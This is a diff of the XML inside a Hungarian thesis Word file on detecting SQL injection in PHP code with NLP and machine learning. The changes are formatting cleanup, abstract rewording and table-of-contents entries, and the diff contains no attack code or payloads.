--- a/szakdolgozat.docx
+++ b/szakdolgozat.docx
@@ -143,7 +143,6 @@
           <w:bCs/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -152,176 +151,9 @@
           <w:bCs/>
           <w:sz w:val="32"/>
           <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">SQL injection </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>detection</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>using</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>natural</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>language</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>processing</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>systems</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>machine</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>learning</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        </w:rPr>
+        <w:t>SQL injection detection using natural language processing systems and machine learning</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -826,7 +658,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc69730693"/>
+      <w:bookmarkStart w:id="1" w:name="_Toc70106693"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -905,7 +737,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc69730694"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc70106694"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1039,33 +871,15 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">egy kód SQL </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>injection</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>beli</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>egy kód SQL injection</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">beli </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1115,15 +929,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">PHP </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">kódokból generálok absztrakt szintaxis fákat, amelyeket felcímkézek, mint sérülékeny és nem sérülékeny példák. Ezek átesnek egy vektorizáláson, majd </w:t>
+        <w:t xml:space="preserve">PHP kódokból generálok absztrakt szintaxis fákat, amelyeket felcímkézek, mint sérülékeny és nem sérülékeny példák. Ezek átesnek egy vektorizáláson, majd </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1207,7 +1013,6 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
@@ -1216,7 +1021,6 @@
         </w:rPr>
         <w:t>IntelliJ</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:i w:val="0"/>
@@ -1353,41 +1157,15 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">A program a bemenetként megadott PHP kódra </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">és </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>c</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>lassifier</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> típusra </w:t>
+        <w:t>A program a bemenetként megadott PHP kódra</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1411,23 +1189,23 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">annak </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">hatékonyságát, valamint </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">egy valószínűségi számot ad, amely a </w:t>
+        <w:t xml:space="preserve">egy </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">százalékos értéket </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i w:val="0"/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ad, amely a </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1536,9 +1314,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> train/test készlet,</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1547,9 +1324,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>train</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1558,7 +1334,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>/test készlet,</w:t>
+        <w:t>K-Fold</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1568,7 +1344,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1578,7 +1354,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>K-Fold</w:t>
+        <w:t>c</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1588,9 +1364,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">onfusion mátrix, </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1599,7 +1374,7 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>c</w:t>
+        <w:t>r</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1609,9 +1384,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>onfusion</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>ecal</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1620,40 +1394,8 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> mátrix, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>r</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ecal</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b w:val="0"/>
-          <w:bCs/>
-          <w:i w:val="0"/>
-          <w:iCs/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>l</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:b w:val="0"/>
@@ -1713,7 +1455,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:bookmarkStart w:id="4" w:name="_Toc69730695"/>
+          <w:bookmarkStart w:id="4" w:name="_Toc70106695"/>
           <w:r>
             <w:rPr>
               <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -1765,7 +1507,7 @@
             </w:rPr>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc69730693" w:history="1">
+          <w:hyperlink w:anchor="_Toc70106693" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1793,7 +1535,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69730693 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70106693 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1838,7 +1580,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69730694" w:history="1">
+          <w:hyperlink w:anchor="_Toc70106694" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1866,7 +1608,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69730694 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70106694 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1911,7 +1653,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69730695" w:history="1">
+          <w:hyperlink w:anchor="_Toc70106695" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1939,7 +1681,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69730695 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70106695 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1984,11 +1726,12 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69730696" w:history="1">
+          <w:hyperlink w:anchor="_Toc70106696" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:noProof/>
+                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>BEVEZETÉS</w:t>
             </w:r>
@@ -2011,7 +1754,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69730696 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70106696 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2057,7 +1800,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc69730697" w:history="1">
+          <w:hyperlink w:anchor="_Toc70106697" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2101,7 +1844,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc69730697 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70106697 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2121,7 +1864,463 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>5</w:t>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TJ2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="880"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+              <w:lang w:val="hu-HU"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc70106698" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>1.1.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Meghatározása</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70106698 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TJ3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="1320"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+              <w:lang w:val="hu-HU"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc70106699" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>1.1.1.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Példa</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70106699 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TJ2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="880"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+              <w:lang w:val="hu-HU"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc70106700" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>1.2.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Következményei</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70106700 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TJ2"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="880"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+              <w:lang w:val="hu-HU"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc70106701" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>1.3.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>Megelőzési módjai</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70106701 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TJ3"/>
+            <w:tabs>
+              <w:tab w:val="left" w:pos="1320"/>
+              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
+              <w:sz w:val="22"/>
+              <w:szCs w:val="22"/>
+              <w:lang w:val="hu-HU"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc70106702" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>1.3.1.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Példa</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
